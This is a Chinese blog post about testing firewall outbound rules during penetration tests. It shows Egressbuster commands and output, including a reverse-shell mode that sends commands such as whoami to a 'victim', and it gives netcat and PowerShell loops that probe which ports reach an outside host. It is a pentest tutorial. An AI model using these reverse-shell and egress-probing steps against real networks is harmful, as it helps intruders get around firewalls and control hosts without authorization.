MENU

防火墙出站规则测试

March 31, 2018 • Security

写点什么,关于渗透时的防火墙出站规则测试

MetaSploit

reverse_tcp_allports模块,不细写了。可以参考:

https://blog.rapid7.com/2009/09/24/forcing-payloads-through-restrictive-firewalls/

再介绍另外两款工具

Egressbuster

第一个是Egressbuster:https://github.com/trustedsec/egressbuster

egressbuster用于检测端口,他有Python版本和封装好的EXE,非常方便。egressbuster_listener.py用来监听反弹Shell。

使用:

最简单的

python egressbuster.py 183.xx.xx.xx 1-65535
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 65535/tcp
[*] Connection made to 183.xx.xx.xx on port: 22/tcp
[*] Connection made to 183.xx.xx.xx on port: 80/tcp
[*] Connection made to 183.xx.xx.xx on port: 443/tcp
[v] Trying: TCP 1000
[v] Trying: TCP 2000

... <snip> ...

[v] Trying: TCP 31000
[*] Connection made to 183.xx.xx.xx on port: 31337/tcp
[*] Connection made to 183.xx.xx.xx on port: 31338/tcp
[*] Connection made to 183.xx.xx.xx on port: 31339/tcp
[v] Trying: TCP 32000
[v] Trying: TCP 33000

... <snip> ...

[v] Trying: TCP 65000
[*] All packets have been sent
[i] Remaining threads: 301
[i] Remaining threads: 102
[i] Remaining threads: 3

... <snip> ...

python egress_listener.py 183.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
[*] Connected from 172.xx.xx.xx on port: 80/tcp
[*] Connected from 172.xx.xx.xx on port: 443/tcp
[*] Connected from 172.xx.xx.xx on port: 31338/tcp
[*] Connected from 172.xx.xx.xx on port: 31337/tcp
[*] Connected from 172.xx.xx.xx on port: 31339/tcp
^C
[*] Exiting and removing iptables redirect rule.
[*] Done

反弹Shell

python egressbuster.py 183.xx.xx.xx 1-50 shell
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 50/tcp
[*] Connection made to 183.xx.xx.xx on port: 22/tcp
[*] All packets have been sent
[i] Remaining threads: 50
[i] Remaining threads: 50
[i] Remaining threads: 1
[i] Remaining threads: 1
[*] Done

python egress_listener.py 183.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
Enter the command to send to the victim:
Enter the command to send to the victim: whoami
megatron\ray
Enter the command to send to the victim: ipconfig
Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : xxx
   IPv4 Address. . . . . . . . . . . : 192.168.5.xx
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.5.1

Tunnel adapter isatap.

letmeoutofyour

另外一个由mubix创建的用于测试出站规则的站点:www.letmeoutofyour.net

使用:

Windows

Powershell:

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("链接:http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); 
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}

Cmd:

for /L %i in (1,1,1024) do @nc.exe -z -v letmeoutofyour.net %i | findstr "w00tw00t"

Linux

Bash (using netcat): for ((i=1; i<1024; i++)) do nc -z -v letmeoutofyour.net $i | grep "w00tw00t"; done

Python:

https://gist.github.com/re4lity/1ef33901255aec093e1e71d3193c2e82

Archives QR Code
QR Code for this page
Tipping QR Code